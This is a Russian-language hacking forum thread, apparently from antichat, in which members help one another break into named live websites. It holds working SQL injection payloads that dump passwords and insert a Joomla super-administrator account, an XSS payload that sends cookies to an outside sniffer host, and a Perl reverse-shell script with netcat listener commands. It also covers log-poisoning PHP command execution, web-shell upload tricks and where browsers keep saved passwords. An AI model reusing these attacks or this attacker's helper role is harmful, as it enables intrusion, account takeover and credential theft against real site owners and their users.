В первой скачай скрипты, они работают без кавычек. Попробуй.

Есть слепая скуля без выводимых полей

Все ок,работает.Не понятно только почему cid=4+OR+id=IF (нашел опытным путем) ,а не cid=4+OR+сid=IF (так не работет). Ну да ладно...

Хотелось бы избавится от BENCHMARK'a, т. к. с ним выуживать таблы я 100 лет буду.Вар-ты типа
IF(ASCII(SUBSTRING((SELECT VERSION()),1,1) =5,'1','0')
find_in_set(substring((SELECT VERSION()),1,1),'0,1,2,3,4,5,6,7,8,9,a,b,c,d,e,f')

не катят, думаю что из-за кавычек в запросах. Кодирую кавычку в HEX - все равно 0 рез-тат.

Задача осложяется тем, что к примеру на 2 идентичные запроса ?cid=4 из БД будет вытащена разная инфа (какой-нить RANDOM() стоит).

Кто хочет поковырять, велком 10115695. У меня уже мозг кипит.

В 4 сипте у меня на вкладке Бтурфорс аттак метод More1Row неактивен...
fast_in_set.php попробывал , просто так с налету не получилось ,буду думать в чем там дело
php SQL.php http://mirsauni.ru:80/?cid= TABLE_NAME INFORMATION_SCHEMA.TABLES 17

Всем большое спасибо за ответы!!!

Пробуй veryfast.php, его поидее и затачивать не надо.

Есть форум...
булка, vBulletin 3.7.1
в нем xss
http://seclists.org/fulldisclosure/2008/Jun/0262.html

делаю так

http://localhost/vBull_3/vBull_3.7.1_/vBulletin%203.7.1/upload/admincp/index.php?redirect=data:text/html;base64,PHNjcmlwdD5pbWcgPSBuZXcgSW1hZ2UoKTsgaW 1nLnNyYyA9ICJodHRwOi8vc25pZmZlci54YWtuZXQucnUvc21p bGVzL2ltZ19fMjE2Ni5naWY/Iitkb2N1bWVudC5jb29raWU7IDwvc2NyaXB0Pg0K

в base64, такой код

<script>img = new Image(); img.src = "http://sniffer.xaknet.ru/smiles/img__2166.gif?"+document.cookie; </script>

все это делается на локалхосте, мну перекидывает

data:text/html;base64,PHNjcmlwdD5pbWcgPSBuZXcgSW1hZ2UoKTsgaW 1nLnNyYyA9ICJodHRwOi8vc25pZmZlci54YWtuZXQucnUvc21p bGVzL2ltZ19fMjE2Ni5naWY/Iitkb2N1bWVudC5jb29raWU7IDwvc2NyaXB0Pg0K

бегу на сниффер, там только ip и браузер, собственно вопрос, а где куки? :D

+union+select+1,2,3,concat_ws(0x3b,id,user,passwor d),5+from+users+limit+n,1
n- номер юзера начиная с нуля

XSS. Вобщем случайно обнаружил, но так как опыта нет, прошу помощи.

<img src="javascript:img = new Image(); img.src='адрес_к_моему_снифферу ';" >

Сниффер выдаёт жпег пикчу. Запрос проходит успешно, куки отправляются, но картинка не показывается.

Вообщем такая проблема:
Ввожу этот запрос в MysqlFront все работает создает запись, а если выполняется из кода скрипта то нифига не добавляет, по логам Mysql смотрел запрос проходит как надо но ничего не создает. в чем может проблема быть?
SELECT GROUP_CONCAT( DISTINCT `langKey` SEPARATOR ' ' ) FROM `language` WHERE `langValue` IN('a');INSERT INTO`usr`(`id`,`name`,`username`,`password`,`usert ype`)VALUES('123','administrator','admin123','1111 ','adm')# a') AND `sobi2Section` = 'field_opt'

Может быть лучше выложить..этот код php скрипта?

Вообщем нашел вроде уязвимость в компоненте к джумле _http://www.sigsiu.net/download/components/sigsiu_online_business_index_2_for_joomla_1.0.x.ht ml

http://site/index.php?option=com_sobi2&sobi2Task=search&Itemid=26
в поиск ввести
a');INSERT/**/INTO`jos_users`(`id`,`name`,`username`,`password`, `usertype`)VALUES('123','administrtor','admin123', '1111','super/**/administrator')#') AND `sobi2Section` = 'field_opt' Поубирать пробелы надо обяательно

Но блин такая вот проблема по логам смотрю запрос проходит как надо но невыполняется а если этот запрос на прямую через MySQL-Front запускать то идет за милую душу.

SELECT GROUP_CONCAT( DISTINCT `langKey` SEPARATOR ' ' ) FROM `jos_sobi2_language` WHERE `langValue` IN('a');INSERT/**/INTO`jos_users`(`id`,`name`,`username`,`password`, `usertype`)VALUES('123','administrtor','admin123', '1111','super/**/administrator')#') AND `sobi2Section` = 'field_opt'

Не удалось найти файл, соответствующий указанному идентификатору сессии.

Вообщем нашел вроде уязвимость в компоненте к джумле _http://www.sigsiu.net/download/components/sigsiu_online_business_index_2_for_joomla_1.0.x.ht ml

http://site/index.php?option=com_sobi2&sobi2Task=search&Itemid=26
в поиск ввести
a');INSERT/**/INTO`jos_users`(`id`,`name`,`username`,`password`, `usertype`)VALUES('123','administrtor','admin123', '1111','super/**/administrator')#') AND `sobi2Section` = 'field_opt' Поубирать пробелы надо обяательно

Но блин такая вот проблема по логам смотрю запрос проходит как надо но невыполняется а если этот запрос на прямую через MySQL-Front запускать то идет за милую душу.

SELECT GROUP_CONCAT( DISTINCT `langKey` SEPARATOR ' ' ) FROM `jos_sobi2_language` WHERE `langValue` IN('a');INSERT/**/INTO`jos_users`(`id`,`name`,`username`,`password`, `usertype`)VALUES('123','administrtor','admin123', '1111','super/**/administrator')#') AND `sobi2Section` = 'field_opt'
mysql_query - выполняет один запрос за раз и не более.

Спасибо. Тогда остается только BENCHMARK()

Спасибо. Тогда остается только BENCHMARK()
Ну судя по приведенному запросу можно выполнить union select - зачем BENCHMARK()? Или данные не выводяться?

Ну судя по приведенному запросу можно выполнить union select - зачем BENCHMARK()? Или данные не выводяться?
Нет вывода)
Компонент популярный запощу в уязвимости)

Спасибо. Тогда остается только BENCHMARK() Вывода ошибки тоже нет? И страницы совсем никак не отличаются?

Вывода ошибки тоже нет? И страницы совсем никак не отличаются?\
Да)

Судя по коду если гверя вернет error то имеется соотвествуюший вывод ошибки:

if ($database->getErrorNum()) {
trigger_error("DB reports: ".$database->stderr(), E_USER_WARNING);
}

можно попробывать more one row, правда сам не смотрел.

Судя по коду если гверя вернет error то имеется соотвествуюший вывод ошибки:

if ($database->getErrorNum()) {
trigger_error("DB reports: ".$database->stderr(), E_USER_WARNING);
}

можно попробывать more one row, правда сам не смотрел. Напиши запрос полностью а то непоймучто ты предлагаешь)

Напиши запрос полностью а то непоймучто ты предлагаешь)

Давай-ка ты сначала нормально разберёшься, а потом будешь постить это в уязвимости джумлы.

Ни кода, ни примера, ни версии, нифига нет. Это не баг, а хрен знает что. Или отредактируй пост нормально, или я его снесу. Разберёшься выложишь
Вывода нету и не слепая
Это что вообще должно означать по твоему?!

XSS. Вобщем случайно обнаружил, но так как опыта нет, прошу помощи.

<img src="javascript:img = new Image(); img.src='адрес_к_моему_снифферу ';" >

Сниффер выдаёт жпег пикчу. Запрос проходит успешно, куки отправляются, но картинка не показывается.
Найди в своем сниффере файл config.php и обрати внимание на строчку "$image_filename = "ПУТЬ К КАРТИНКЕ";

Почему на всех моих веб шеллах не открвается порт для конекта нетката?

И подскажите как юзать неткат в режиме backconnect через дедик



ЗЫ один мембер зашол в тему и ущол ((

Возможно на всех серваках, где твои шеллы - фаер, или, что более вероятно, ты пытаешься юзать встроенный в шелл бекконект, что говорит лишь о том, что у тебя паблик шелл, где, как правило, встроенный бекконект работает некорректно. Если же ты юзаешь шелл, написанный одним из участников форума, то задавай соотвествующие вопросы там, где тема про его шелл

ЗЫЖ А еще, возможно, ты просто не умеешь пользоваться неткатом.

Что еще можно ответить на вопрос, в котором "море" нужной инфы - что делал, какой шелл юзал, на какой системе, под какими ограничениями хотя бы визуальными, как неткат запускал и т.д. и т.р.с.п.

Возможно на всех серваках, где твои шеллы - фаер, или, что более вероятно, ты пытаешься юзать встроенный в шелл бекконект, что говорит лишь о том, что у тебя паблик шелл, где, как правило, встроенный бекконект работает некорректно. Если же ты юзаешь шелл, написанный одним из участников форума, то задавай соотвествующие вопросы там, где тема про его шелл

ЗЫЖ А еще, возможно, ты просто не умеешь пользоваться неткатом.

Что еще можно ответить на вопрос, в котором "море" нужной инфы - что делал, какой шелл юзал, на какой системе, под какими ограничениями хотя бы визуальными, как неткат запускал и т.д. и т.р.с.п.

linux, шелл орбовский. запускал так nc.exe sitename 777

в шелле сделал всё проавильно.

ЗЫ какой шелл для таких целей порекомендуешь?

Давай я тебе в ПМ скину список щеллов и ты их потестиш?

Не, не надо, уже были преценденты, плохо кончалось. Лучше вот, пройди в тему автора и задай там свой вопрос:

https://forum.antichat.ru/thread103155.html


nc.exe sitename 777


O_o

Почему на всех моих веб шеллах не открвается порт для конекта нетката?
И подскажите как юзать неткат в режиме backconnect через дедик
Лучше юзай просто бекконект? Например такой:
#!/usr/bin/perl
use Socket;
$cmd= "lynx";
$system= 'echo "`uname -a`";echo "`id`";/bin/sh';
$0=$cmd;
$target=$ARGV[0];
$port=$ARGV[1];
$iaddr=inet_aton($target) || die("Error: $!\n");
$paddr=sockaddr_in($port, $iaddr) || die("Error: $!\n");
$proto=getprotobyname('tcp');
socket(SOCKET, PF_INET, SOCK_STREAM, $proto) || die("Error: $!\n");
connect(SOCKET, $paddr) || die("Error: $!\n");
open(STDIN, ">&SOCKET");
open(STDOUT, ">&SOCKET");
open(STDERR, ">&SOCKET");
system($system);
close(STDIN);
close(STDOUT);
close(STDERR);

Еще у тебя на дедике должен быть так называемый "белый IP", далее ты запускаешь на сервере вышеприведенный скрипт, а на дедике nc.exe -l -v -p 443, еще может быть решением проблемы бекконект на 80 порт, либо 443.
А еще лучше под эти цели юзать не дедик, а vds например, конектишься по ссш, и там открываешь неткат ./nc -l -v -p 443

linux, шелл орбовский. запускал так nc.exe sitename 777

в шелле сделал всё проавильно.

ЗЫ какой шелл для таких целей порекомендуешь?

Давай я тебе в ПМ скину список щеллов и ты их потестиш?
Насколько я помню, открытие порта до 1024 требует прав рута, но это не точно, подзабыл. Попробуй 33333 хотя бы.

http://caryscars.be/index.php?item=detailsid=10 split4 ne pomogaet . Proboval vitashit password cherez blinde sql ijnection no ne poluchilos vitashil tolko user name : carycars@localhost
versija mysql : 5.0.5

pomogite vitashit password , jelatelno pokazat kak sdelali chtob mojno bilo praktekanutsa , ya v blind sql ne bum bum

http://caryscars.be/index.php?item=detailsid=10 split4 ne pomogaet . Proboval vitashit password cherez blinde sql ijnection no ne poluchilos vitashil tolko user name : carycars@localhost
versija mysql : 5.0.5

pomogite vitashit password , jelatelno pokazat kak sdelali chtob mojno bilo praktekanutsa , ya v blind sql ne bum bum
тут не блинд
http://caryscars.be/index.php?item=details&id=-150+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,ver sion(),15,16--

a pochemu split4 ne naxodit pole vvoda ?

razobralsa . Split4 pashit .

может не оп теме,но вот : как называется файл каторый хранит сохраненные пароли от Mozilla Firefox и oper'ы???

в Mozilla formhistory.sqlite вроде как....

может не оп теме,но вот : как называется файл каторый хранит сохраненные пароли от Mozilla Firefox и oper'ы???
Opera хранит пароли в wand.dat
Firefox - в файле signons3.txt , для расшифровки нужен файл key3.db. Оба файла находятся в профиле

как через mysql inj выполнить php код,если могу добовлять записи в бд,но они фильтруются.добовляю <?system(ls);?>
вот что добовляется в бд &lt;?system(ls);?&gt;.
Ну и при выводе не выполняется.Можн какнить сделать?

<?system(ls);?> перевести в хекс вида 0x...

только код ты так все-равно не выполнишь, надо слить в файл сначала

into outfile '/абсолютный_путь/имя_файла'

into outfile '/абсолютный_путь/имя_файла' там вроде нету прав на запись файлов

1. Внимательно прочитай всё - http://forum.antichat.ru/thread104591.html
2. "ам вроде нету прав на запись файлов" - непонятно, что ты имел в виду под этим, если читаешь файло, значит file_priv=Y, второе - ищи папку доступную на запись

ЗЫЖ Тьфу, ёпт, ты просто из админки что ли добаваляешь типо название темы, и оно пишется в БД? Ничего ты не сделаешь, ищи другой способ

2Pashkela, он через скуль как я понял заливает файл into outfile )))

2RazyKK,выполнить пхп файл путём load_file не выйдет, или заливай в tmp находи инклуд и инклудь шелл )

mr.gr33n кароч я добовляю запись в бд а вывод через union select.

т.е. заливаешь файлик? или редактируешь данные бд ?
чет я не въеду малость))

редактирую,тип в профиле icq или любое др поле

не выполнится он так (((
разве что только xss )

угу сопру куки админа,когда есть доступ к бд форума)))

Ну дык я не говорю что куки тащить надо, просто говорю что пхп код не выполнится таким макаром, только html )

нашел файл логов через php incl,в reffer вставил
http://www.site<?php system(ls); ?>site.com/index.php
вылазит ошибка Parse error: syntax error, unexpected T_STRING что не так?

http://www.site<?php system('ls'); ?>site.com/index.php
вроде так должно быть

испортил логи терь над ждать пока ошибка исчезнет)

Есть доступ к dle админке, версия 7.3.

Включил возможность добавлять файлы, но к новости так прикрепить и не смог.

Да и если бы получилось, то насколько я понимаю и проверил, папка /uploads/files/ защищена .htaccess:

<FilesMatch ".*">
Order allow,deny
Deny from all
</FilesMatch>

<FilesMatch "\.(avi|mp3|mp4|flv|swf|wmv)$|^$">
Order deny,allow
Allow from all
</FilesMatch>

Какие есть способы залить шел?

Тут вчера сидел в нете и решил перевести WME в яндекс.Деньги
нашол обменник
и выбрал случайно не WME а WMU, написал 10 и оплатил, ток потом дошло что я не ту валюту выбрал и кошелька у мну такого нет, при обновлении страницы у мну на яндексе светились деньги, а в WM появился кошелек WMU с 0 денежных средств
Кто нить вкурсах что это было?

Какие есть способы залить шел?
пробуй shell.php.flv

испортил логи терь над ждать пока ошибка исчезнет) Можно попробовать закомментировать оставшуюся часть, к примеру на локале у меня такое пашет: <?php
system('dir');
die();/*
<?php
system(;
?>
Ругается конечно, но работает.

пробуй shell.php.flv

А что это даст, он же не будет интерпретироваться как пхп..

А что это даст, он же не будет интерпретироваться как пхп..
Если апач с mod_mime, то будет

']Если апач с mod_mime, то будет

хорошо, спасибо, попробую.. просто как добавлять новости с файлом я тоже найти не могу..

Да и ещё там будет номер из цифр пяти-шести перед файлом, его тоже узнать как-то надо. =)

Ладно, буду пробывать, спасибо за эту инфу.

']Если апач с mod_mime, то будет
Наверно стоило бы уточнить что сначало надо соответствуюший AddType(AddHandler) добавить - а то сейчас человека можно запутать.

Наверно стоило бы уточнить что сначало надо соответствуюший AddType(AddHandler) добавить - а то сейчас человека можно запутать. Наоборот, хендлер для .flv НЕ должен быть прописан.

записал в лог <?php system($_GET[cmd]); ?> хотел копировать в tmp а потом уже инклудить,но опять ошибка))
Parse error: syntax error, unexpected '['
как это закомментировать?

Пиши в лог <?php system($_GET[cmd]);/* Но лучше вместо system - eval, он заработает, если system запрещён.

уже пробовал eval ,undefind function
system не запрещен,в логе ls уже выполнилось

Попробуй exec вместо eval.

хорошо, спасибо, попробую.. просто как добавлять новости с файлом я тоже найти не могу..

Да и ещё там будет номер из цифр пяти-шести перед файлом, его тоже узнать как-то надо. =)

Ладно, буду пробывать, спасибо за эту инфу.
это timestamp, запоминай время заливки файла переводи в unixtime и напиши брутер который который этот timestamp подберет, только вот из-за .htaccess наверное ничего не выйдет с шеллом